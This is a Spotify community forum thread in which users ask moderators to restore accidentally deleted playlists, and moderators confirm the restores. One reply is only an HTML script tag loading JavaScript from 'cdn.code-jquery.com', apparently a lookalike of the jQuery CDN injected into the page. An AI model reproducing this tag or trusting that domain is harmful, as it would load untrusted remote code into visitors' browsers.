Announcements

Help Wizard

Step 1

NEXT STEP

FAQs

Please see below the most popular frequently asked questions.

Loading article...

Loading faqs...

Ongoing Issues

Please see below the current ongoing issues which are under investigation.

Loading issue...

Loading ongoing issues...

Recover deleted playlist

Solved!

Recover deleted playlist

Know this is a long shot but.... I've accidentally deleted a playlist I've spent weeks working on. Is there any way of getting it back?

It's called 'Boat party' and there was about 100 songs on it. Thanks.

1,112 Replies

@medhat wrote:

Dear Kind Moderators 🙂

I have deleted my "Liked from Radio" list by accident, just 10 minutes ago...will you kindly help me restore it ?

Thank you very much,

best regards,

Medhat

All sorted!

Check out our Twitter for the latest updates on any service issues: @Spotifystatus

Problem solved? Click 'Accept as solution' to make it easier to find for others!

New to the Community? Check out our Community newbie tips

I've deleted mine just a couple minutes ago, I was trying to delete a song but extendedly delete the hole playlist.

I was wondering if mine could be restored swell, It's called "roosje".

@NielsLinden wrote:

I've deleted mine just a couple minutes ago, I was trying to delete a song but extendedly delete the hole playlist.

I was wondering if mine could be restored swell, It's called "roosje".

Done.

Check out our Twitter for the latest updates on any service issues: @Spotifystatus

Problem solved? Click 'Accept as solution' to make it easier to find for others!

Thank you!!

I don't even know what happened! I guess I accidentaly pressed the wrong button and deleted my playlist .. I would try to remember all the songs but there were 250 ( give or take ) songs on the playlist! Is there anything I can do to restore this?! I don't exactally remember the playlist name ;; I believe it was called MUSIC though .( yeah, yeah, I know very creative name right? ) 

Hello all!

I have just by a mistake deleted my favorite spotify playlist.. There were about 147 tracks on it and I have really worked a long time on it. Is it possible that I can recover it? The playlist was called "Rappe de rap". Can anyone please help me? 

JonasBach

Done!

Thank you!!

Hi! I accidentally deleted one of my playlists aswell. It's called, "September." and it had about 180 songs on it with 11 hours worth of fantastic music. Is there any way I could get it back? I deleted it about 10 minutes ago.

-Rithinay

@Rithinay wrote:

Hi! I accidentally deleted one of my playlists aswell. It's called, "September." and it had about 180 songs on it with 11 hours worth of fantastic music. Is there any way I could get it back? I deleted it about 10 minutes ago.

-Rithinay

Done.

I accidentally just deleted a playlist called Mid 90s Music Race

It had 45 songs on it. Can I get it back?

When you have a song highlighted in a playlsit and hit 'delete' it deletes the whole playlist =/

Hi atJOLO - I've just returned that playlist for you. 

However, I've not been able to replicate deleting a playlist like that. You just have one song highlighted and the whole playlist disappears?

It's possible that I thought I had the song highlighted when really the playlist was some how highlighted instead.

Either way, I feel like, since the playlist file still exists somewhere, there should be a built in way to recover playlists =D

Thank you for recovering it!!

Hi everyone, I just had the same probleme and accidentally deleted my playlist called "aout 2012" on which I worked hard and contained more that 7 hours music

Can anyone help with that? I don't thinkl any of my friends copied it...
Thanks a lot!

@acvuccino wrote:

Hi everyone, I just had the same probleme and accidentally deleted my playlist called "aout 2012" on which I worked hard and contained more that 7 hours music

Can anyone help with that? I don't thinkl any of my friends copied it...
Thanks a lot!

Done!

Thanks a LOT!!

Is it possible to get the playlist that is supposed to show all the songs have liked from radio back please, not sure why but its not currently showing in my playlists!

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>

i just lost my playlist called "everything" and i have no idea how to get it back. can anyone help me please!!, i tried attempting to make a new one but i cant remember all the songs that were on it 😞 

Hello, i accidentaly created a new playlist, tried to delete it and ended up deleting my main playlist. It had about 500 songs in it, and it was called "sounds". Can it be restored? I would love to have it back..

Regs, Kristian / eniggma

Im really upset and I don't even know how I did it. I deleted over 1400 songs I had on my playlist. Anyway to retrieve it before it's to late? Thanks everyone!

Suggested posts